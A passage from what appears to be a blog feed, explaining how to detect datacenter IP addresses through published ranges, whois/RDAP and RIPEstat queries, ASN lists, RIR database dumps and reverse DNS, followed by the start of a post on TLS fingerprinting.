<li>How stringent are the steps to obtain an IP address in a legal sense? For example, in order to obtain a mobile SIM card, in many countries of the world, <a href="https://prepaid-data-sim-card.fandom.com/wiki/Registration_Policies_Per_Country">you need to identify with your passport upon mobile contract settlement</a>.</li>
<li>Where is the IP address located geographically? There are countries with an higher reputation and countries with lower reputation.</li>
</ol>
<p>The reputation of an IP address boils down to the question:</p>
<blockquote>
<p>How hard is it for anonymous third parties to obtain IP addresses (preferrably in large quantities) from a network without having to undergo a strict identification process (in a legal sense - showing an ID card or passport)?</p>
</blockquote>
<p>Datacenters and cloud providers such as <a href="https://www.digitalocean.com/">DigitalOcean</a>, <a href="https://www.hetzner.com/">Hetzner</a>, <a href="https://www.ovhcloud.com/en/">OVH</a>, <a href="https://aws.amazon.com/">Amazon AWS</a> and <a href="https://azure.microsoft.com/en-us/">Microsoft Azure</a> allow third parties to rent hosting infrastructure and thus give them access to their network. Those data centers make it relatively easy for third-parties to send traffic from their network.</p>
<p>For example, there are many projects that make use of the Amazon AWS infrastructure to proxy traffic through their network. One such example is the <a href="https://github.com/Ge0rg3/requests-ip-rotator">Ge0rg3/requests-ip-rotator</a> library, which allows to <em>utilize AWS API Gateway's large IP pool as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing.</em></p>
<p>Therefore, if a IP address can be traced to a datacenter / cloud provider, it can be conjured that the resulting traffic is of lower reputation, since it is very easy to rent hosting/network infrastructure in large quantities for any party. In reality, most website visitors that come from datacenter IP address ranges are probably in 99% of all cases bots.</p>
<p>In this blog article, a straightforward technical process is presented, that determines if an IP address belongs to a datacenter or not.</p>
<h2>Sources/Algorithms for checking whether an IP address belongs to a Hosting / Cloud Provider</h2>
<h3>Idea 1: Lookup in Self-Published IP-Ranges from Datacenters</h3>
<p>First, check if the IP is to be found in self-published IP-ranges (Often in CIDR format) from datacenter providers. Not every datacenter provider publishes their IP-ranges. And sometimes, the publishes IP ranges are incomplete. But it certainly makes sense to incorporate self-published datacenter IP ranges in the lookup process.</p>
<ol>
<li>Amazon AWS publishes their IP ranges: <a href="https://docs.aws.amazon.com/general/latest/gr/aws-ip-ranges.html">Amazon AWS IP ranges</a></li>
<li>Google Cloud also publishes their IP ranges: <a href="https://www.gstatic.com/ipranges/cloud.json">Google Cloud IP ranges</a></li>
<li>Counterexample: <a href="https://www.hetzner.com/">Hetzner.com</a> does not publish IP ranges!</li>
<li>Counterexample: <a href="https://www.ovhcloud.com/en/">OVH Cloud</a> also doesn't publish IP ranges...</li>
</ol>
<p>This is how those published IP ranges look like (excerpt) from <a href="https://www.gstatic.com/ipranges/cloud.json">Google Cloud</a>:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"syncToken"</span><span class="p">:</span><span class="w"> </span><span class="s2">"1647190988307"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"creationTime"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2022-03-13T10:03:08.30788"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"prefixes"</span><span class="p">:</span><span class="w"> </span><span class="p">[{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ipv4Prefix"</span><span class="p">:</span><span class="w"> </span><span class="s2">"35.185.128.0/19"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Google Cloud"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"scope"</span><span class="p">:</span><span class="w"> </span><span class="s2">"asia-east1"</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ipv4Prefix"</span><span class="p">:</span><span class="w"> </span><span class="s2">"35.185.160.0/20"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Google Cloud"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"scope"</span><span class="p">:</span><span class="w"> </span><span class="s2">"asia-east1"</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ipv4Prefix"</span><span class="p">:</span><span class="w"> </span><span class="s2">"35.187.144.0/20"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Google Cloud"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"scope"</span><span class="p">:</span><span class="w"> </span><span class="s2">"asia-east1"</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ipv4Prefix"</span><span class="p">:</span><span class="w"> </span><span class="s2">"35.189.160.0/19"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Google Cloud"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"scope"</span><span class="p">:</span><span class="w"> </span><span class="s2">"asia-east1"</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ipv4Prefix"</span><span class="p">:</span><span class="w"> </span><span class="s2">"35.201.128.0/17"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Google Cloud"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"scope"</span><span class="p">:</span><span class="w"> </span><span class="s2">"asia-east1"</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="p">]</span><span class="w"></span>
</code></pre></div>
<p>Obviously, self-published IP ranges are not sufficient. Most datacenters do not publish their complete set of IP ranges. Other sources have to be considered. One obvious source is <code>whois</code> data from Regional Internet registries (RIR). The task of RIRs is to:</p>
<blockquote>
<p>Manage the allocation and registration of Internet number resources within a region of the world. Internet number resources include IP addresses and autonomous system (AS) numbers.</p>
</blockquote>
<h3>Idea 2: Whois/RDAP Lookups</h3>
<p>If an IP address is not found in self-published IP ranges from datacenters, a <a href="https://www.arin.net/resources/registry/whois/">Whois/RDAP lookup</a> of the IP address can be conducted. Example:</p>
<div class="highlight"><pre><span></span><code>whois <span class="m">105</span>.226.177.72 <span class="p">|</span> grep -E -i <span class="s2">"(OrgName:|address:|OrgTechName:|descr:)"</span>
</code></pre></div>
<p>If the name of the organization belongs to a datacenter, we have a match. This is a simple string matching approach.</p>
<p>Downside: Whois/RDAP lookups do not scale and it's an expensive operation in terms of time (A TCP/IP connection has to be established). Whois/RDAP servers could and will block a single server after many requests.</p>
<p>In fact, <a href="https://www.ripe.net/manage-ips-and-asns/db/support/querying-the-ripe-database">ripe.net states the following</a>:</p>
<blockquote>
<p>Please note that when searching for resources such as an IP address block or AS Number, contact information from related objects will automatically be returned as well. You can only query for a limited amount of personal information every day. After reaching that limit, you will be blocked from making further queries. To disable automatic queries for personal information, please use the "-r" flag, as explained in the Advanced Queries section.</p>
</blockquote>
<p>Whois lookups can be improved when you specify the whois database manually, so it's possible to load balance to some extent:</p>
<div class="highlight"><pre><span></span><code>$ whois -h whois.radb.net <span class="m">138</span>.197.186.3
route: <span class="m">138</span>.197.176.0/20
changed: noc@digitalocean.com <span class="m">20180515</span> <span class="c1">#16:51:53Z</span>
member-of: RS-Digitalocean
origin: AS14061
source: RADB
descr: DigitalOcean
mnt-by: MAINT-AS14061
</code></pre></div>
<p>You can also make direkt RDAP queries:</p>
<div class="highlight"><pre><span></span><code>curl https://rdap.arin.net/registry/ip/18.236.125.255
<span class="c1"># snip</span>
<span class="s2">"handle"</span> : <span class="s2">"AEA8-ARIN"</span>,
<span class="s2">"vcardArray"</span> : <span class="o">[</span> <span class="s2">"vcard"</span>, <span class="o">[</span> <span class="o">[</span> <span class="s2">"version"</span>, <span class="o">{</span> <span class="o">}</span>, <span class="s2">"text"</span>, <span class="s2">"4.0"</span> <span class="o">]</span>, <span class="o">[</span> <span class="s2">"adr"</span>, <span class="o">{</span>
<span class="s2">"label"</span> : <span class="s2">"Amazon Web Services Elastic Compute Cloud, EC2\n410 Terry Avenue North\nSeattle\nWA\n98109-5210\nUnited States"</span>
<span class="o">}</span>, <span class="s2">"text"</span>, <span class="o">[</span> <span class="s2">""</span>, <span class="s2">""</span>, <span class="s2">""</span>, <span class="s2">""</span>, <span class="s2">""</span>, <span class="s2">""</span>, <span class="s2">""</span> <span class="o">]</span> <span class="o">]</span>, <span class="o">[</span> <span class="s2">"fn"</span>, <span class="o">{</span> <span class="o">}</span>, <span class="s2">"text"</span>, <span class="s2">"Amazon EC2 Abuse"</span> <span class="o">]</span>, <span class="o">[</span> <span class="s2">"org"</span>, <span class="o">{</span> <span class="o">}</span>, <span class="s2">"text"</span>, <span class="s2">"Amazon EC2 Abuse"</span> <span class="o">]</span>, <span class="o">[</span> <span class="s2">"kind"</span>, <span class="o">{</span> <span class="o">}</span>, <span class="s2">"text"</span>, <span class="s2">"group"</span> <span class="o">]</span>, <span class="o">[</span> <span class="s2">"email"</span>, <span class="o">{</span> <span class="o">}</span>, <span class="s2">"text"</span>, <span class="s2">"abuse@amazonaws.com"</span> <span class="o">]</span>, <span class="o">[</span> <span class="s2">"tel"</span>, <span class="o">{</span>
<span class="s2">"type"</span> : <span class="o">[</span> <span class="s2">"work"</span>, <span class="s2">"voice"</span> <span class="o">]</span>
<span class="o">}</span>, <span class="s2">"text"</span>, <span class="s2">"+1-206-266-4064"</span> <span class="o">]</span> <span class="o">]</span> <span class="o">]</span>,
<span class="s2">"roles"</span> : <span class="o">[</span> <span class="s2">"abuse"</span> <span class="o">]</span>,
<span class="s2">"remarks"</span> : <span class="o">[</span> <span class="o">{</span>
<span class="s2">"title"</span> : <span class="s2">"Registration Comments"</span>,
<span class="c1"># snip</span>
</code></pre></div>
<p>The <a href="https://github.com/RIPE-NCC/whois/wiki/WHOIS-REST-API">RIPE-NCC whois database is documented here</a> and <a href="https://www.ripe.net/manage-ips-and-asns/db/support/documentation/ripe-database-documentation">on www.ripe.net</a>.</p>
<p>There also exists a good tutorial on <a href="https://www.ripe.net/manage-ips-and-asns/db/support/querying-the-ripe-database">Querying the RIPE Database</a>.</p>
<p>This is how a API request to the <a href="https://github.com/RIPE-NCC/whois/wiki/WHOIS-REST-API">RIPE-NCC whois database</a> look like with curl. <a href="https://www.ripe.net/manage-ips-and-asns/db/support/documentation/ripe-database-documentation/how-to-query-the-ripe-database/restful-api-queries/api-lookup">Here is an example API lookup</a> which looks up an <a href="https://www.ripe.net/manage-ips-and-asns/db/support/documentation/ripe-database-documentation/rpsl-object-types/4-2-descriptions-of-primary-objects/4-2-4-description-of-the-inetnum-object">inetnum object</a> (API output modified for brevity):</p>
<div class="highlight"><pre><span></span><code>curl -H <span class="s1">'Accept: application/json'</span> <span class="s1">'https://rest.db.ripe.net/ripe/inetnum/193.0.0.0%20-%20193.0.7.255?unfiltered'</span>
<span class="o">{</span>
<span class="s2">"objects"</span>:<span class="o">{</span>
<span class="s2">"object"</span>:<span class="o">[</span>
<span class="o">{</span>
<span class="s2">"type"</span>:<span class="s2">"inetnum"</span>,
<span class="s2">"link"</span>:<span class="o">{</span>
<span class="s2">"type"</span>:<span class="s2">"locator"</span>,
<span class="s2">"href"</span>:<span class="s2">"https://rest.db.ripe.net/ripe/inetnum/193.0.0.0 - 193.0.7.255"</span>
<span class="o">}</span>,
<span class="s2">"source"</span>:<span class="o">{</span>
<span class="s2">"id"</span>:<span class="s2">"ripe"</span>
<span class="o">}</span>,
<span class="s2">"primary-key"</span>:<span class="o">{</span>
<span class="s2">"attribute"</span>:<span class="o">[</span>
<span class="o">{</span>
<span class="s2">"name"</span>:<span class="s2">"inetnum"</span>,
<span class="s2">"value"</span>:<span class="s2">"193.0.0.0 - 193.0.7.255"</span>
<span class="o">}</span>
<span class="o">]</span>
<span class="o">}</span>,
<span class="s2">"attributes"</span>:<span class="o">{</span>
<span class="s2">"attribute"</span>:<span class="o">[</span>
<span class="o">{</span>
<span class="s2">"name"</span>:<span class="s2">"inetnum"</span>,
<span class="s2">"value"</span>:<span class="s2">"193.0.0.0 - 193.0.7.255"</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"name"</span>:<span class="s2">"netname"</span>,
<span class="s2">"value"</span>:<span class="s2">"RIPE-NCC"</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"name"</span>:<span class="s2">"descr"</span>,
<span class="s2">"value"</span>:<span class="s2">"RIPE Network Coordination Centre"</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"link"</span>:<span class="o">{</span>
<span class="s2">"type"</span>:<span class="s2">"locator"</span>,
<span class="s2">"href"</span>:<span class="s2">"https://rest.db.ripe.net/ripe/organisation/ORG-RIEN1-RIPE"</span>
<span class="o">}</span>,
<span class="s2">"name"</span>:<span class="s2">"org"</span>,
<span class="s2">"value"</span>:<span class="s2">"ORG-RIEN1-RIPE"</span>,
<span class="s2">"referenced-type"</span>:<span class="s2">"organisation"</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"name"</span>:<span class="s2">"descr"</span>,
<span class="s2">"value"</span>:<span class="s2">"Amsterdam, Netherlands"</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"name"</span>:<span class="s2">"remarks"</span>,
<span class="s2">"value"</span>:<span class="s2">"Used for RIPE NCC infrastructure."</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"name"</span>:<span class="s2">"country"</span>,
<span class="s2">"value"</span>:<span class="s2">"NL"</span>
<span class="o">}</span>,
<span class="o">]</span>
<span class="o">}</span>
<span class="o">}</span>
<span class="o">]</span>
<span class="o">}</span>
<span class="o">}</span>
</code></pre></div>
<p>You can also look up other whois data objects such as:</p>
<ul>
<li><a href="https://www.ripe.net/manage-ips-and-asns/db/support/documentation/ripe-database-documentation/rpsl-object-types/4-2-descriptions-of-primary-objects/4-2-1-description-of-the-aut-num-object">AUT-NUM Object</a></li>
<li><a href="https://www.ripe.net/manage-ips-and-asns/db/support/documentation/ripe-database-documentation/rpsl-object-types/4-2-descriptions-of-primary-objects/4-2-2-description-of-the-domain-object">DOMAIN Object</a></li>
<li><a href="https://www.ripe.net/manage-ips-and-asns/db/support/documentation/ripe-database-documentation/rpsl-object-types/4-2-descriptions-of-primary-objects/4-2-3-description-of-the-inet6num-object">INET6NUM Object</a></li>
<li><a href="https://www.ripe.net/manage-ips-and-asns/db/support/documentation/ripe-database-documentation/rpsl-object-types/4-2-descriptions-of-primary-objects/4-2-5-description-of-the-route-object">ROUTE Object</a></li>
<li><a href="https://www.ripe.net/manage-ips-and-asns/db/support/documentation/ripe-database-documentation/rpsl-object-types/4-2-descriptions-of-primary-objects/4-2-6-description-of-the-route6-object">ROUTE6 Object</a></li>
</ul>
<p>Another API lookup example:</p>
<div class="highlight"><pre><span></span><code>curl -H <span class="s1">'Accept: application/json'</span> <span class="s1">'https://rest.db.ripe.net/ripe/route/193.0.0.0%20-%20193.0.7.255?unfiltered'</span>
</code></pre></div>
<h3>Idea 3: RIPEstat API</h3>
<p>Another excellent ressource from RIPE NCC is the <a href="https://stat.ripe.net/docs/01.getting-started/#getting-started-with-ripestat">RIPEstat API</a>.</p>
<p>What is RIPEstat?</p>
<blockquote>
<p>RIPEstat is a large-scale information service and the RIPE NCC’s open data platform. You can get essential information on IP address space and Autonomous System Numbers (ASNs) along with related statistics on specific hostnames and countries.</p>
</blockquote>
<p>Potential downside: API calls are restricted. No possibility to download the database. Only for RIPE-NCC, not the other RIRs. Observation: Seems to be slow?!</p>
<p>For the purpose of finding datacenter IP ranges, the following API endpoints are especially interesting:</p>
<h4>Endpoint: <a href="https://stat.ripe.net/docs/02.data-api/address-space-hierarchy.html">Address Space Hierarchy</a></h4>
<blockquote>
<p>This data call returns address space objects (inetnum or inet6num) from the RIPE Database related to the queried resource.</p>
</blockquote>
<p>Example:</p>
<div class="highlight"><pre><span></span><code>curl --location --request GET <span class="s2">"https://stat.ripe.net/data/address-space-hierarchy/data.json?resource=193.47.99.0/24"</span>
<span class="o">{</span>
<span class="s2">"data_call_name"</span>: <span class="s2">"address-space-hierarchy"</span>,
<span class="s2">"data_call_status"</span>: <span class="s2">"supported"</span>,
<span class="s2">"cached"</span>: false,
<span class="s2">"data"</span>: <span class="o">{</span>
<span class="s2">"rir"</span>: <span class="s2">"ripe"</span>,
<span class="s2">"resource"</span>: <span class="s2">"193.47.99.0/24"</span>,
<span class="s2">"exact"</span>: <span class="o">[</span>
<span class="o">{</span>
<span class="s2">"inetnum"</span>: <span class="s2">"193.47.99.0 - 193.47.99.255"</span>,
<span class="s2">"netname"</span>: <span class="s2">"HETZNER-PORTABLE-PI"</span>,
<span class="s2">"country"</span>: <span class="s2">"DE"</span>,
<span class="s2">"org"</span>: <span class="s2">"ORG-HOA1-RIPE"</span>,
<span class="s2">"admin-c"</span>: <span class="s2">"HOAC1-RIPE"</span>,
<span class="s2">"tech-c"</span>: <span class="s2">"HOAC1-RIPE"</span>,
<span class="s2">"status"</span>: <span class="s2">"ASSIGNED PI"</span>,
<span class="s2">"mnt-by"</span>: <span class="s2">"RIPE-NCC-END-MNTHOS-GUN"</span>,
<span class="s2">"mnt-domains"</span>: <span class="s2">"HOS-GUN"</span>,
<span class="s2">"mnt-routes"</span>: <span class="s2">"HOS-GUNMYLOC-MNT"</span>,
<span class="s2">"created"</span>: <span class="s2">"2005-07-07T15:27:12Z"</span>,
<span class="s2">"last-modified"</span>: <span class="s2">"2016-04-14T08:14:55Z"</span>,
<span class="s2">"source"</span>: <span class="s2">"RIPE"</span>
<span class="o">}</span>
<span class="o">]</span>,
<span class="s2">"more_specific"</span>: <span class="o">[]</span>,
<span class="s2">"query_time"</span>: <span class="s2">"2022-03-14T13:34:32"</span>,
<span class="s2">"parameters"</span>: <span class="o">{</span>
<span class="s2">"resource"</span>: <span class="s2">"193.47.99.0/24"</span>
<span class="o">}</span>
<span class="o">}</span>,
<span class="s2">"query_id"</span>: <span class="s2">"20220314133432-07794397-fd21-4a59-b335-af95bcab6d0d"</span>,
<span class="s2">"process_time"</span>: <span class="m">116</span>,
<span class="o">}</span>
</code></pre></div>
<h4>Endpoint: <a href="https://stat.ripe.net/docs/02.data-api/address-space-usage.html">Address Space Usage</a></h4>
<blockquote>
<p>This data call shows the usage of a prefix or IP range according to the objects currently present in the RIPE database. The data returned lists the assignments and allocations covered by the queried resource as well statistics on the total numbers of IPs in the different categories.</p>
</blockquote>
<p>Example: </p>
<div class="highlight"><pre><span></span><code>curl --location --request GET <span class="s2">"https://stat.ripe.net/data/address-space-usage/data.json?resource=95.216.0.0/16"</span>
<span class="o">{</span>
<span class="s2">"data_call_name"</span>: <span class="s2">"address-space-usage"</span>,
<span class="s2">"data_call_status"</span>: <span class="s2">"supported"</span>,
<span class="s2">"cached"</span>: false,
<span class="s2">"data"</span>: <span class="o">{</span>
<span class="s2">"query_time"</span>: <span class="s2">"2022-03-13T00:00:00"</span>,
<span class="s2">"resource"</span>: <span class="s2">"95.216.0.0/16"</span>,
<span class="s2">"assignments"</span>: <span class="o">[</span>
<span class="o">{</span>
<span class="s2">"address_range"</span>: <span class="s2">"95.216.0.0/26"</span>,
<span class="s2">"asn_name"</span>: <span class="s2">"HETZNER-hel1-dc2"</span>,
<span class="s2">"status"</span>: <span class="s2">"ASSIGNED PA"</span>,
<span class="s2">"parent_allocation"</span>: <span class="s2">"95.216.0.0/15"</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"address_range"</span>: <span class="s2">"95.216.0.64/26"</span>,
<span class="s2">"asn_name"</span>: <span class="s2">"HETZNER-hel1-dc2"</span>,
<span class="s2">"status"</span>: <span class="s2">"ASSIGNED PA"</span>,
<span class="s2">"parent_allocation"</span>: <span class="s2">"95.216.0.0/15"</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"address_range"</span>: <span class="s2">"95.216.0.128/26"</span>,
<span class="s2">"asn_name"</span>: <span class="s2">"HETZNER-hel1-dc2"</span>,
<span class="s2">"status"</span>: <span class="s2">"ASSIGNED PA"</span>,
<span class="s2">"parent_allocation"</span>: <span class="s2">"95.216.0.0/15"</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"address_range"</span>: <span class="s2">"95.216.0.192/26"</span>,
<span class="s2">"asn_name"</span>: <span class="s2">"HETZNER-hel1-dc2"</span>,
<span class="s2">"status"</span>: <span class="s2">"ASSIGNED PA"</span>,
<span class="s2">"parent_allocation"</span>: <span class="s2">"95.216.0.0/15"</span>
<span class="o">}</span>
<span class="c1"># snip</span>
<span class="o">]</span>
<span class="o">}</span>
<span class="o">}</span>
</code></pre></div>
<h4>Endpoint: <a href="https://stat.ripe.net/docs/02.data-api/announced-prefixes.html">Announced Prefixes</a></h4>
<blockquote>
<p>This data call returns all announced prefixes for a given ASN. The results can be restricted to a specific time period.</p>
</blockquote>
<p>Example: </p>
<div class="highlight"><pre><span></span><code>curl --location --request GET <span class="s2">"https://stat.ripe.net/data/announced-prefixes/data.json?resource=24940&starttime=2020-12-12T12:00"</span>
<span class="o">{</span>
<span class="s2">"messages"</span>: <span class="o">[</span>
<span class="o">[</span>
<span class="s2">"info"</span>,
<span class="s2">"Results exclude routes with very low visibility (less than 10 RIS full-feed peers seeing)."</span>
<span class="o">]</span>
<span class="o">]</span>,
<span class="s2">"version"</span>: <span class="s2">"1.2"</span>,
<span class="s2">"data_call_name"</span>: <span class="s2">"announced-prefixes"</span>,
<span class="s2">"data_call_status"</span>: <span class="s2">"supported - connecting to ursa"</span>,
<span class="s2">"cached"</span>: false,
<span class="s2">"data"</span>: <span class="o">{</span>
<span class="s2">"prefixes"</span>: <span class="o">[</span>
<span class="o">{</span>
<span class="s2">"prefix"</span>: <span class="s2">"185.209.124.0/22"</span>,
<span class="s2">"timelines"</span>: <span class="o">[</span>
<span class="o">{</span>
<span class="s2">"starttime"</span>: <span class="s2">"2020-12-12T16:00:00"</span>,
<span class="s2">"endtime"</span>: <span class="s2">"2022-03-14T08:00:00"</span>
<span class="o">}</span>
<span class="o">]</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"prefix"</span>: <span class="s2">"185.171.224.0/22"</span>,
<span class="s2">"timelines"</span>: <span class="o">[</span>
<span class="o">{</span>
<span class="s2">"starttime"</span>: <span class="s2">"2020-12-12T16:00:00"</span>,
<span class="s2">"endtime"</span>: <span class="s2">"2022-03-14T08:00:00"</span>
<span class="o">}</span>
<span class="o">]</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"prefix"</span>: <span class="s2">"185.228.8.0/23"</span>,
<span class="s2">"timelines"</span>: <span class="o">[</span>
<span class="o">{</span>
<span class="s2">"starttime"</span>: <span class="s2">"2020-12-12T16:00:00"</span>,
<span class="s2">"endtime"</span>: <span class="s2">"2022-03-14T08:00:00"</span>
<span class="o">}</span>
<span class="o">]</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"prefix"</span>: <span class="s2">"195.248.224.0/24"</span>,
<span class="s2">"timelines"</span>: <span class="o">[</span>
<span class="o">{</span>
<span class="s2">"starttime"</span>: <span class="s2">"2020-12-12T16:00:00"</span>,
<span class="s2">"endtime"</span>: <span class="s2">"2022-03-14T08:00:00"</span>
<span class="o">}</span>
<span class="o">]</span>
<span class="o">}</span>
<span class="c1"># snip</span>
<span class="o">]</span>
<span class="o">}</span>
<span class="o">}</span>
</code></pre></div>
<h3>Idea 4: ASN Lookups</h3>
<p>Some Regional Internet Registries publish lists of AS numbers and the associated companies.</p>
<p><a href="https://ftp.ripe.net/ripe/asnames/">Example ASN list for RIPE-NCC</a>.</p>
<p>Excerpt:</p>
<div class="highlight"><pre><span></span><code>[...]
24928 NORDEAPL-AS Nordea Bank Polska SA, PL
24929 NGCS IT arte Sp. z o.o., PL
24931 DEDIPOWER Pulsant Limited, GB
24933 MINXS-AS MILLENNIUMS.NET GmbH, DE
24935 ATE-AS AVENIR TELEMATIQUE SAS, FR
24936 RIM2000M-AS Plusinfo OOO, RU
24937 UNTN PJSC "Ukrtelecom", UA
24938 TELECITYREDBUS-IT TELECITYGROUP INTERNATIONAL LIMITED, GB
24939 IVV ivv Informationsverarbeitung fuer Versicherungen GmbH, DE
24940 HETZNER-AS Hetzner Online GmbH, DE
24941 -Reserved AS-, ZZ
24944 ARENA-AS Arena Bilgisayar San. ve Tic A.S, TR
24945 ASN-VNTP Telecommunication Company Vinteleport Ltd., UA
24947 OZ-IP-Transit Parsun Network Solutions PTY LTD, AU
24949 BTCML-AXA-AS AXA Technology Services UK Limited, GB
24950 SOFIASAT-AS Venus REIT OOD, BG
[...]
</code></pre></div>
<p>The idea is to lookup well known database names in this ASN lists and then perform a search such as:</p>
<div class="highlight"><pre><span></span><code><span class="nb">echo</span> <span class="s1">'AS24940'</span> <span class="p">|</span> nc whois.radb.net <span class="m">43</span>
</code></pre></div>
<h3>Idea 5: Download whois databases from Region Internet Registries (RIR)</h3>
<p>There are six regional internet registries:</p>
<ol>
<li>RIPE NCC (Established in 1992)</li>
<li>APNIC (Established in 1993)</li>
<li>ARIN (Established in 1997)</li>
<li>LACNIC (Established in 1999)</li>
<li>NRO (Established in 2003)</li>
<li>AFRINIC (Established in 2004)</li>
</ol>
<p>Almost all of them publish <code>whois</code> databases on their FTP servers.</p>
<p>The whois databases for the RIRs can be found here (<strong>Careful</strong>, some of those links download large files):</p>
<ul>
<li><a href="https://ftp.afrinic.net/pub/dbase/afrinic.db.gz">AFRINIC whois database</a></li>
<li><a href="https://ftp.apnic.net/apnic/whois/">APNIC whois database</a></li>
<li><a href="https://ftp.lacnic.net/lacnic/dbase/lacnic.db.gz">LACNIC whois database</a></li>
<li><a href="https://ftp.arin.net/pub/rr/arin.db.gz">ARIN whois database</a></li>
<li><a href="https://ftp.ripe.net/ripe/dbase/ripe.db.gz">RIPE-NCC whois database</a></li>
</ul>
<p>The <a href="https://ftp.ripe.net/ripe/dbase/ripe.db.gz">RIPE-NCC database</a> is quite large:</p>
<div class="highlight"><pre><span></span><code>curl -I https://ftp.ripe.net/ripe/dbase/ripe.db.gz
HTTP/1.1 <span class="m">200</span> OK
Date: Sun, <span class="m">13</span> Mar <span class="m">2022</span> <span class="m">21</span>:07:26 GMT
Server: Apache
Last-Modified: Sun, <span class="m">13</span> Mar <span class="m">2022</span> <span class="m">01</span>:57:42 GMT
ETag: <span class="s2">"16382ea0-5da0fe3b0d490"</span>
Accept-Ranges: bytes
Content-Length: <span class="m">372780704</span>
Content-Type: application/x-gzip
</code></pre></div>
<p>Uncompressed, the RIPE-NCC database is 5.5GB large. </p>
<p>Whois databases (which are in fact simple text files) do store information in records known as objects. These are blocks of text in a standard notation defined in the Routing Policy Specification Language (RPSL). An object has multiple fields, called attributes or keys, that each have a value. Below is an example of a route object: <a href="https://www.ripe.net/manage-ips-and-asns/db/support/querying-the-ripe-database">Source</a></p>
<div class="highlight"><pre><span></span><code>route: 5.9.0.0/16
descr: HETZNER-RZ-FKS-BLK5
origin: AS24940
mnt-by: HOS-GUN
created: 2012-04-26T10:30:12Z
last-modified: 2012-04-26T10:30:12Z
source: RIPE
remarks: ****************************
remarks: * THIS OBJECT IS MODIFIED
remarks: * Please note that all data that is generally regarded as personal
remarks: * data has been removed from this object.
remarks: * To view the original object, please query the RIPE Database at:
remarks: * http://www.ripe.net/whois
remarks: ****************************
</code></pre></div>
<p>Querying those whois databases is still by far the best source of data in order to infer whether an IP belongs to a datacenter or not.</p>
<h3>Idea 6: Reverse DNS Lookups</h3>
<p>Reverse DNS Lookups could also be an idea. Sometimes reverse DNS queries for an IP address reveal that the IP address belongs to a datacenter. Obvious downside: DNS queries are slow!</p>
<div class="highlight"><pre><span></span><code>dig -x <span class="m">167</span>.99.241.135
<span class="p">;;</span> AUTHORITY SECTION:
<span class="m">241</span>.99.167.in-addr.arpa. <span class="m">1800</span> IN SOA ns1.digitalocean.com. hostmaster.241.99.167.in-addr.arpa. <span class="m">1647194251</span> <span class="m">10800</span> <span class="m">3600</span> <span class="m">604800</span> <span class="m">1800</span>
</code></pre></div>
<h2>Conclusion</h2>
<p>There are many different sources that are helpful when deciding whether an IP address belongs to a datacenter or not.</p>
<p>But the following steps are essential and most relevant:</p>
<ol>
<li>Self published IP ranges from hosting providers need to be considered</li>
<li>The downloadable whois databases from RIR's such as RIPE-NCC or ARIN can be searched.</li>
<li>Manual task: A list of datacenters and hosting providers needs to be compiled. With this list of datacenter needles, the whois databases from the RIR's can be searched/grepped.</li>
</ol>Fingerprinting TLS - Core differences between TLS 1.2 and TLS 1.32022-01-18T12:46:00+01:002022-02-02T18:35:00+01:00Nikolai Tschachertag:incolumitas.com,2022-01-18:/2022/01/18/fingerprinting-TLS/<p>In this blog post, I highlight the core differences between TLS 1.2 and TLS 1.3 and investigate how we can use several properties of the protocol to obtain fingerprinting entropy from TLS clients.</p><p><a
class="orange_button"
href="https://tls.incolumitas.com/fps">
Get your TLS Fingerprint here
</a></p>
<p>— </p>
<p><a
class="orange_button"
href="https://tls.incolumitas.com/stats">
View TLS Fingerprint Statistics
</a></p>
<h2>Goal of this Article</h2>
<p>The goal of this blog post is twofold:</p>
<ol>
<li>To gain a <strong>better understanding</strong> of the TLS 1.2 and TLS 1.3 protocol.</li>
<li>Finding stable entropy sources in the TLS handshake to <strong>fingerprint TLS clients</strong>. A TLS fingerprint allows me to infer what kind of TLS client library or operating system a client is using. </li>
</ol>
